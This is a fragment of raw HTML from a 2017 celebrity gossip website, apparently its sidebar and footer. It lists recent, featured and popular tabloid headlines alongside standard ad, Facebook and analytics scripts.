<div class="td_block_wrap td_block_7 td_block_widget td_uid_9_58fb774947e62_rand td_with_ajax_pagination td-pb-border-top"  data-td-block-uid="td_uid_9_58fb774947e62" ><script>var block_td_uid_9_58fb774947e62 = new tdBlock();
block_td_uid_9_58fb774947e62.id = "td_uid_9_58fb774947e62";
block_td_uid_9_58fb774947e62.atts = '{"limit":"10","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"MOST RECENTS","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"load_more","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_9_58fb774947e62_rand","offset":"","css":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_9_58fb774947e62.td_column_number = "1";
block_td_uid_9_58fb774947e62.block_type = "td_block_7";
block_td_uid_9_58fb774947e62.post_count = "10";
block_td_uid_9_58fb774947e62.found_posts = "18173";
block_td_uid_9_58fb774947e62.header_color = "#";
block_td_uid_9_58fb774947e62.ajax_pagination_infinite_stop = "";
block_td_uid_9_58fb774947e62.max_num_pages = "1818";
tdBlocksArray.push(block_td_uid_9_58fb774947e62);
</script><h4 class="block-title"><span>MOST RECENTS</span></h4><div id=td_uid_9_58fb774947e62 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/john-cena-farts-on-nikki-bella-after-they-get-naked-in-racy-youtube-video-watch/" rel="bookmark" title="John Cena Farts On Nikki Bella After They Get Naked In Racy YouTube Video — Watch"><img width="100" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/John-Cena-1-100x70.png" alt="John Cena" title="John Cena Farts On Nikki Bella After They Get Naked In Racy YouTube Video — Watch"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/john-cena-farts-on-nikki-bella-after-they-get-naked-in-racy-youtube-video-watch/" rel="bookmark" title="John Cena Farts On Nikki Bella After They Get Naked In Racy YouTube Video — Watch">John Cena Farts On Nikki Bella After They Get Naked In...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-22T11:02:45+00:00" >April 22, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/katy-perry-calls-herself-a-kardashian-rocking-platinum-braids-massive-cleavage-pic/" rel="bookmark" title="Katy Perry Calls Herself A Kardashian Rocking Platinum Braids &#038; Massive Cleavage — Pic"><img width="100" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Katy-Perry-100x70.png" alt="Katy Perry" title="Katy Perry Calls Herself A Kardashian Rocking Platinum Braids &#038; Massive Cleavage — Pic"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/katy-perry-calls-herself-a-kardashian-rocking-platinum-braids-massive-cleavage-pic/" rel="bookmark" title="Katy Perry Calls Herself A Kardashian Rocking Platinum Braids &#038; Massive Cleavage — Pic">Katy Perry Calls Herself A Kardashian Rocking Platinum Braids &#038; Massive...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-22T10:53:13+00:00" >April 22, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/selena-gomez-at-david-henries-wedding-she-stuns-in-gorgeous-red-dress-pic/" rel="bookmark" title="Selena Gomez At David Henrie’s Wedding: She Stuns In Gorgeous Red Dress — Pic"><img width="100" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Selena-Gomez-4-100x70.png" alt="Selena Gomez" title="Selena Gomez At David Henrie’s Wedding: She Stuns In Gorgeous Red Dress — Pic"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/selena-gomez-at-david-henries-wedding-she-stuns-in-gorgeous-red-dress-pic/" rel="bookmark" title="Selena Gomez At David Henrie’s Wedding: She Stuns In Gorgeous Red Dress — Pic">Selena Gomez At David Henrie’s Wedding: She Stuns In Gorgeous Red...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-22T10:40:00+00:00" >April 22, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" rel="bookmark" title="Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report"><img width="100" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Aaron-Hernandez-100x70.png" alt="Aaron Hernandez" title="Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/aaron-hernandez-wrote-suicide-note-to-alleged-gay-prison-lover-before-death-report/" rel="bookmark" title="Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before Death — Report">Aaron Hernandez Wrote Suicide Note To Alleged Gay Prison Lover Before...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-22T10:33:19+00:00" >April 22, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/kris-jenner-dreading-caitlyns-2020%e2%80%b2-interview-she-feels-weird-having-sex-life-exposed/" rel="bookmark" title="Kris Jenner Dreading Caitlyn’s ’20/20′ Interview: ‘She Feels Weird’ Having Sex Life Exposed"><img width="100" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Caitlyn-Jenner-1-100x70.png" alt="Caitlyn Jenner" title="Kris Jenner Dreading Caitlyn’s ’20/20′ Interview: ‘She Feels Weird’ Having Sex Life Exposed"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/kris-jenner-dreading-caitlyns-2020%e2%80%b2-interview-she-feels-weird-having-sex-life-exposed/" rel="bookmark" title="Kris Jenner Dreading Caitlyn’s ’20/20′ Interview: ‘She Feels Weird’ Having Sex Life Exposed">Kris Jenner Dreading Caitlyn’s ’20/20′ Interview: ‘She Feels Weird’ Having Sex...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-22T10:11:48+00:00" >April 22, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/t-i-was-brought-to-tears-hearing-tiny-admit-their-marriage-is-over-on-wendy-williams/" rel="bookmark" title="T.I. Was Brought To Tears Hearing Tiny Admit Their Marriage Is Over On ‘Wendy Williams’"><img width="100" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/T.I.-100x70.png" alt="T.I." title="T.I. Was Brought To Tears Hearing Tiny Admit Their Marriage Is Over On ‘Wendy Williams’"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/t-i-was-brought-to-tears-hearing-tiny-admit-their-marriage-is-over-on-wendy-williams/" rel="bookmark" title="T.I. Was Brought To Tears Hearing Tiny Admit Their Marriage Is Over On ‘Wendy Williams’">T.I. Was Brought To Tears Hearing Tiny Admit Their Marriage Is...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-21T15:28:08+00:00" >April 21, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/kim-kardashian-blasts-blac-chynas-hurtful-motives-for-dating-rob-its-fed-up/" rel="bookmark" title="Kim Kardashian Blasts Blac Chyna’s ‘Hurtful’ Motives For Dating Rob: It’s ‘F***ed Up’"><img width="100" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/kim-kardashain-100x70.png" alt="Kim Kardashian" title="Kim Kardashian Blasts Blac Chyna’s ‘Hurtful’ Motives For Dating Rob: It’s ‘F***ed Up’"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/kim-kardashian-blasts-blac-chynas-hurtful-motives-for-dating-rob-its-fed-up/" rel="bookmark" title="Kim Kardashian Blasts Blac Chyna’s ‘Hurtful’ Motives For Dating Rob: It’s ‘F***ed Up’">Kim Kardashian Blasts Blac Chyna’s ‘Hurtful’ Motives For Dating Rob: It’s...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-21T15:20:17+00:00" >April 21, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/paulie-giganti-dead-hells-kitchen-star-shockingly-dies-at-36/" rel="bookmark" title="Paulie Giganti Dead: ‘Hell’s Kitchen’ Star Shockingly Dies At 36"><img width="100" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Paulie-Giganti-100x70.png" alt="Paulie Giganti" title="Paulie Giganti Dead: ‘Hell’s Kitchen’ Star Shockingly Dies At 36"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/paulie-giganti-dead-hells-kitchen-star-shockingly-dies-at-36/" rel="bookmark" title="Paulie Giganti Dead: ‘Hell’s Kitchen’ Star Shockingly Dies At 36">Paulie Giganti Dead: ‘Hell’s Kitchen’ Star Shockingly Dies At 36</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-21T15:05:00+00:00" >April 21, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/blake-shelton-gwen-stefani-fans-beg-him-to-propose-after-he-gushes-over-her/" rel="bookmark" title="Blake Shelton &#038; Gwen Stefani: Fans Beg Him To Propose After He Gushes Over Her"><img width="100" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/01/Gwen-Stefani1-100x70.png" alt="Gwen Stefani" title="Blake Shelton &#038; Gwen Stefani: Fans Beg Him To Propose After He Gushes Over Her"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/blake-shelton-gwen-stefani-fans-beg-him-to-propose-after-he-gushes-over-her/" rel="bookmark" title="Blake Shelton &#038; Gwen Stefani: Fans Beg Him To Propose After He Gushes Over Her">Blake Shelton &#038; Gwen Stefani: Fans Beg Him To Propose After...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-21T14:55:39+00:00" >April 21, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/christina-el-moussa-flaunts-nipples-amazing-abs-in-bikini-see-sizzling-pic/" rel="bookmark" title="Christina El Moussa Flaunts Nipples &#038; Amazing Abs In Bikini — See Sizzling Pic"><img width="100" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Christina-El-Moussa-100x70.png" alt="Christina El Moussa" title="Christina El Moussa Flaunts Nipples &#038; Amazing Abs In Bikini — See Sizzling Pic"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/christina-el-moussa-flaunts-nipples-amazing-abs-in-bikini-see-sizzling-pic/" rel="bookmark" title="Christina El Moussa Flaunts Nipples &#038; Amazing Abs In Bikini — See Sizzling Pic">Christina El Moussa Flaunts Nipples &#038; Amazing Abs In Bikini —...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-21T14:50:15+00:00" >April 21, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div><div class="td-load-more-wrap"><a href="#" class="td_ajax_load_more td_ajax_load_more_js" id="next-page-td_uid_9_58fb774947e62" data-td_block_id="td_uid_9_58fb774947e62">Load more<i class="td-icon-font td-icon-menu-down"></i></a></div></div> <!-- ./block --><aside class="widget widget_text"><div class="block-title"><span>Advertisement</span></div>			<div class="textwidget"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:block"
     data-ad-format="autorelaxed"
     data-ad-client="ca-pub-5686136442868151"
     data-ad-slot="1086575221"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
<div class="kontextuaDisplayREGULARSS300x250"></div></div>
		</aside>                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->

<!-- Instagram -->



<!-- Footer -->
<div class="td-footer-wrapper">
    <div class="td-container">

	    <div class="td-pb-row">
		    <div class="td-pb-span12">
			    
 <!-- A generated by theme --> 

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><div class="td-g-rec td-g-rec-id-footer_top ">
<script type="text/javascript">
var td_screen_width = document.body.clientWidth;

                    if ( td_screen_width >= 1140 ) {
                        /* large monitors */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:970px;height:90px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="1086575221"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
            
	                    if ( td_screen_width >= 1019  && td_screen_width < 1140 ) {
	                        /* landscape tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:970px;height:90px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="1086575221"></ins>');
	                        (adsbygoogle = window.adsbygoogle || []).push({});
	                    }
	                
                    if ( td_screen_width >= 768  && td_screen_width < 1019 ) {
                        /* portrait tablets */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:970px;height:90px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="1086575221"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                
                    if ( td_screen_width < 768 ) {
                        /* Phones */
                        document.write('<ins class="adsbygoogle" style="display:inline-block;width:970px;height:90px" data-ad-client="ca-pub-5686136442868151" data-ad-slot="1086575221"></ins>');
                        (adsbygoogle = window.adsbygoogle || []).push({});
                    }
                </script>
</div>

 <!-- end A --> 

		    </div>
	    </div>

        <div class="td-pb-row">

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_7 td_uid_11_58fb77496cb62_rand td-pb-border-top"  data-td-block-uid="td_uid_11_58fb77496cb62" ><script>var block_td_uid_11_58fb77496cb62 = new tdBlock();
block_td_uid_11_58fb77496cb62.id = "td_uid_11_58fb77496cb62";
block_td_uid_11_58fb77496cb62.atts = '{"limit":3,"sort":"featured","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"EDITOR PICKS","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_11_58fb77496cb62_rand","offset":"","css":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_11_58fb77496cb62.td_column_number = "1";
block_td_uid_11_58fb77496cb62.block_type = "td_block_7";
block_td_uid_11_58fb77496cb62.post_count = "3";
block_td_uid_11_58fb77496cb62.found_posts = "375";
block_td_uid_11_58fb77496cb62.header_color = "";
block_td_uid_11_58fb77496cb62.ajax_pagination_infinite_stop = "";
block_td_uid_11_58fb77496cb62.max_num_pages = "125";
tdBlocksArray.push(block_td_uid_11_58fb77496cb62);
</script><h4 class="block-title"><span>EDITOR PICKS</span></h4><div id=td_uid_11_58fb77496cb62 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/kim-kardashian-blasts-blac-chynas-hurtful-motives-for-dating-rob-its-fed-up/" rel="bookmark" title="Kim Kardashian Blasts Blac Chyna’s ‘Hurtful’ Motives For Dating Rob: It’s ‘F***ed Up’"><img width="100" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/kim-kardashain-100x70.png" alt="Kim Kardashian" title="Kim Kardashian Blasts Blac Chyna’s ‘Hurtful’ Motives For Dating Rob: It’s ‘F***ed Up’"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/kim-kardashian-blasts-blac-chynas-hurtful-motives-for-dating-rob-its-fed-up/" rel="bookmark" title="Kim Kardashian Blasts Blac Chyna’s ‘Hurtful’ Motives For Dating Rob: It’s ‘F***ed Up’">Kim Kardashian Blasts Blac Chyna’s ‘Hurtful’ Motives For Dating Rob: It’s...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-21T15:20:17+00:00" >April 21, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/paulie-giganti-dead-hells-kitchen-star-shockingly-dies-at-36/" rel="bookmark" title="Paulie Giganti Dead: ‘Hell’s Kitchen’ Star Shockingly Dies At 36"><img width="100" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/Paulie-Giganti-100x70.png" alt="Paulie Giganti" title="Paulie Giganti Dead: ‘Hell’s Kitchen’ Star Shockingly Dies At 36"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/paulie-giganti-dead-hells-kitchen-star-shockingly-dies-at-36/" rel="bookmark" title="Paulie Giganti Dead: ‘Hell’s Kitchen’ Star Shockingly Dies At 36">Paulie Giganti Dead: ‘Hell’s Kitchen’ Star Shockingly Dies At 36</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-21T15:05:00+00:00" >April 21, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/blake-shelton-gwen-stefani-fans-beg-him-to-propose-after-he-gushes-over-her/" rel="bookmark" title="Blake Shelton &#038; Gwen Stefani: Fans Beg Him To Propose After He Gushes Over Her"><img width="100" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/01/Gwen-Stefani1-100x70.png" alt="Gwen Stefani" title="Blake Shelton &#038; Gwen Stefani: Fans Beg Him To Propose After He Gushes Over Her"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/blake-shelton-gwen-stefani-fans-beg-him-to-propose-after-he-gushes-over-her/" rel="bookmark" title="Blake Shelton &#038; Gwen Stefani: Fans Beg Him To Propose After He Gushes Over Her">Blake Shelton &#038; Gwen Stefani: Fans Beg Him To Propose After...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-04-21T14:55:39+00:00" >April 21, 2017</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->                <aside class="widget widget_sfp_page_plugin_widget"><div class="block-title"><span>LIKE US ON FACEBOOK </span></div><div id="fb-root"></div>
<script>
	(function(d){
		var js, id = 'facebook-jssdk';
		if (d.getElementById(id)) {return;}
		js = d.createElement('script');
		js.id = id;
		js.async = true;
		js.src = "//connect.facebook.net/en_US/all.js#xfbml=1";
		d.getElementsByTagName('head')[0].appendChild(js);
	}(document));
</script>
<!-- SFPlugin by topdevs -->
<!-- Page Plugin Code START -->
<div class="sfp-container">
	<div class="fb-page"
		data-href="http://www.facebook.com/thenewstrack"
		data-width="350"
		data-height="450"
		data-hide-cover="false"
		data-show-facepile="true" 
		data-show-posts="false">
	</div>
</div>
<!-- Page Plugin Code END --></aside><aside class="widget widget_text">			<div class="textwidget">   <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,2186685,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('//s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="/" target="_blank"><img  src="//sstatic1.histats.com/0.gif?2186685&101" alt="counter stats" border="0"></a></noscript>
<!-- Histats.com  END  -->
<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','https://www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-43783327-1', 'auto');
  ga('send', 'pageview');

</script>

</div>
		</aside><aside class="widget widget_text">			<div class="textwidget"></div>
		</aside>            </div>

            <div class="td-pb-span4">
                <div class="td_block_wrap td_block_7 td_uid_12_58fb774973aa3_rand td-pb-border-top"  data-td-block-uid="td_uid_12_58fb774973aa3" ><script>var block_td_uid_12_58fb774973aa3 = new tdBlock();
block_td_uid_12_58fb774973aa3.id = "td_uid_12_58fb774973aa3";
block_td_uid_12_58fb774973aa3.atts = '{"limit":3,"sort":"popular","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"POPULAR POSTS","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"","header_text_color":"","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_uid_12_58fb774973aa3_rand","offset":"","css":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_12_58fb774973aa3.td_column_number = "1";
block_td_uid_12_58fb774973aa3.block_type = "td_block_7";
block_td_uid_12_58fb774973aa3.post_count = "3";
block_td_uid_12_58fb774973aa3.found_posts = "18173";
block_td_uid_12_58fb774973aa3.header_color = "";
block_td_uid_12_58fb774973aa3.ajax_pagination_infinite_stop = "";
block_td_uid_12_58fb774973aa3.max_num_pages = "6058";
tdBlocksArray.push(block_td_uid_12_58fb774973aa3);
</script><h4 class="block-title"><span>POPULAR POSTS</span></h4><div id=td_uid_12_58fb774973aa3 class="td_block_inner">

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/best-new-hairstyle-for-men-2013-fashion/" rel="bookmark" title="Best Latest New Hairstyle For Men 2016-2017"><img width="100" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2013/10/Best-New-Hairstyle-For-Men-2016-2017-100x70.jpg" alt="" title="Best Latest New Hairstyle For Men 2016-2017"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/best-new-hairstyle-for-men-2013-fashion/" rel="bookmark" title="Best Latest New Hairstyle For Men 2016-2017">Best Latest New Hairstyle For Men 2016-2017</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2013-10-05T13:18:00+00:00" >October 5, 2013</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/top-ten-best-9mm-pistols-of-2014/" rel="bookmark" title="Top Ten Best 9mm Pistols Of 2016-2017"><img width="93" height="70" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2014/04/Top-Ten-Best-9mm-Pistols-Of-2014.jpg" alt="Best 9mm Pistols Of 2014" title="Top Ten Best 9mm Pistols Of 2016-2017"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/top-ten-best-9mm-pistols-of-2014/" rel="bookmark" title="Top Ten Best 9mm Pistols Of 2016-2017">Top Ten Best 9mm Pistols Of 2016-2017</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2014-04-25T11:42:18+00:00" >April 25, 2014</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 -->

	<div class="td-block-span12">

        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="http://www.thenewstrack.com/finally-mahira-khan-got-divorced-from-her-husband/" rel="bookmark" title="Finally Mahira Khan Got Divorced from Her Husband"><img width="100" height="61" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2014/03/Finally-Mahira-Khan-Got-divorced-from-Her-Husband-1.jpg" alt="Finally Mahira Khan Got divorced from Her Husband" title="Finally Mahira Khan Got Divorced from Her Husband"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/finally-mahira-khan-got-divorced-from-her-husband/" rel="bookmark" title="Finally Mahira Khan Got Divorced from Her Husband">Finally Mahira Khan Got Divorced from Her Husband</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2014-03-18T14:49:08+00:00" >March 18, 2014</time></span>                            </div>
        </div>

        </div>

        
	</div> <!-- ./td-block-span12 --></div></div> <!-- ./block -->                <div class="td_block_wrap td_block_slide td_block_widget td_uid_13_58fb774a9058d_rand td-pb-border-top"  data-td-block-uid="td_uid_13_58fb774a9058d" ><script>var block_td_uid_13_58fb774a9058d = new tdBlock();
block_td_uid_13_58fb774a9058d.id = "td_uid_13_58fb774a9058d";
block_td_uid_13_58fb774a9058d.atts = '{"limit":"5","sort":"","post_ids":"","tag_slug":"","autors_id":"","installed_post_types":"","category_id":"","category_ids":"","custom_title":"SLIDE SHOW","custom_url":"","show_child_cat":"","sub_cat_ajax":"","ajax_pagination":"","header_color":"#","header_text_color":"#","ajax_pagination_infinite_stop":"","td_column_number":1,"td_ajax_preloading":"","td_ajax_filter_type":"","td_ajax_filter_ids":"","td_filter_default_txt":"All","color_preset":"","border_top":"","class":"td_block_widget td_uid_13_58fb774a9058d_rand","offset":"","css":"","live_filter":"","live_filter_cur_post_id":"","live_filter_cur_post_author":""}';
block_td_uid_13_58fb774a9058d.td_column_number = "1";
block_td_uid_13_58fb774a9058d.block_type = "td_block_slide";
block_td_uid_13_58fb774a9058d.post_count = "5";
block_td_uid_13_58fb774a9058d.found_posts = "18173";
block_td_uid_13_58fb774a9058d.header_color = "#";
block_td_uid_13_58fb774a9058d.ajax_pagination_infinite_stop = "";
block_td_uid_13_58fb774a9058d.max_num_pages = "3635";
tdBlocksArray.push(block_td_uid_13_58fb774a9058d);
</script><h4 class="block-title"><span>SLIDE SHOW</span></h4><div id=td_uid_13_58fb774a9058d class="td_block_inner"><div id="td_uid_14_58fb774a9a431" class="td-theme-slider iosSlider-col-1 td_mod_wrap"><div class="td-slider "><div id="td_uid_14_58fb774a9a431_item_0" class = "td_module_slide td-animation-stack td-image-gradient"><div class="td-module-thumb"><a href="http://www.thenewstrack.com/john-cena-farts-on-nikki-bella-after-they-get-naked-in-racy-youtube-video-watch/" rel="bookmark" title="John Cena Farts On Nikki Bella After They Get Naked In Racy YouTube Video — Watch"><img width="324" height="400" class="entry-thumb" src="http://www.thenewstrack.com/wp-content/uploads/2017/04/John-Cena-1-324x400.png" alt="John Cena" title="John Cena Farts On Nikki Bella After They Get Naked In Racy YouTube Video — Watch"/></a></div><div class="td-slide-meta"><span class="slide-meta-cat"><a href="http://www.thenewstrack.com/category/celebrities/">Celebrities</a></span><h3 class="entry-title td-module-title"><a href="http://www.thenewstrack.com/john-cena-farts-on-nikki-bella-after-they-get-naked-in-racy-youtube-video-watch/" rel="bookmark" title="John Cena Farts On Nikki Bella After 